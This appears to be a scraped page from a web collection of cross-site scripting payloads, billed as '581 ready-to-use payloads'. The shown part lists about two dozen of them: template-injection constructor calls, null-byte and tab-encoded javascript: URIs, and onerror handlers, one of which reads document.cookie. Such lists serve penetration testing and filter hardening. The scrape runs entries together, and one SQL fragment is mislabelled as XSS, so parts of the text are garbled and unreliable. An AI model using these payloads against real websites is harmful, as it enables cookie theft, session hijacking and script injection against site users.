XSS
581 ready-to-use payloads
581 Payloads
581 of 581
`${alert(1)}`
XSS — popup execution
XSSGeneral
Payload
`${alert(1)}`${alert(1)}
XSS — popup execution
XSSGeneral
Payload
${alert(1)}${document.domain}`%26it;/script>'>
XSS — script tag injection
XSSGeneral
Payload
${document.domain}`%26it;/script>'>{{$el.innerHTML='\u003cimg src onerror=alert(1)\u0...
XSS — popup execution
XSSGeneral
Payload
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}{{$emit.constructor`alert(1)`()}}
XSS — popup execution
XSSGeneral
Payload
{{$emit.constructor`alert(1)`()}}{{$eval.constructor('alert(1)')()}}
XSS — popup execution
XSSGeneral
Payload
{{$eval.constructor('alert(1)')()}}{{$on.constructor('alert(1)')()}}
XSS — popup execution
XSSGeneral
Payload
{{$on.constructor('alert(1)')()}}{{$on.constructor('alert("CodePrefer")')()}}
XSS — popup execution
XSSGeneral
Payload
{{$on.constructor('alert("CodePrefer")')()}}$("script(2)")
XSS — script tag injection
XSSGeneral
Payload
$("script(2)")$ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerh...
XSS — popup execution
XSSGeneral
Payload
$ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? ------
%00%00%00%00%00%00%00<script>alert(1)</script>
XSS — popup execution
XSSGeneral
Payload
%00%00%00%00%00%00%00<script>alert(1)</script>
'-alert(1)-'
XSS — popup execution
XSSGeneral
Payload
'-alert(1)-'
'<00 foo="<a%20href="javascript:alert('XSS-Bypass'...
XSS — popup execution
XSSGeneral
Payload
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/�</form><input type="date" onfocus="alert(1)">
XSS — popup execution
XSSGeneral
Payload
�</form><input type="date" onfocus="alert(1)">
<[%00]img onerror=alert(1) src=a>
XSS — popup execution
XSSGeneral
Payload
<[%00]img onerror=alert(1) src=a>
%00"><img src=x onerror=alert`1`//
XSS — popup execution
XSSGeneral
Payload
%00"><img src=x onerror=alert`1`//
%00<script>alert(1);</script>
XSS — popup execution
XSSGeneral
Payload
%00<script>alert(1);</script>
%00<script>alert(1)</script>
XSS — popup execution
XSSGeneral
Payload
%00<script>alert(1)</script>
///%01javascript:alert(document.cookie)/
XSS — popup execution
XSSGeneral
Payload
///%01javascript:alert(document.cookie)/
%09Jav%09ascript:alert(document.domain)
XSS — popup execution
XSSGeneral
Payload
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
XSS — popup execution
XSSGeneral
Payload
/%09/javascript:alert(1)
/%09/javascript:alert(1);
XSS — popup execution
XSSGeneral
Payload
/%09/javascript:alert(1);
%0A%0d+select+user+from+dual+%0A%0D
XSS — encoded/obfuscated
XSSGeneral
Payload
%0A%0d+select+user+from+dual+%0A%0D
%\'});%0aalert(1);%20//
XSS — popup execution
XSSGeneral
Payload
%\'});%0aalert(1);%20//
{{0[a='constructor'][a]('alert(1)')()}}
XSS — popup execution
XSSGeneral
Payload
{{0[a='constructor'][a]('alert(1)')()}}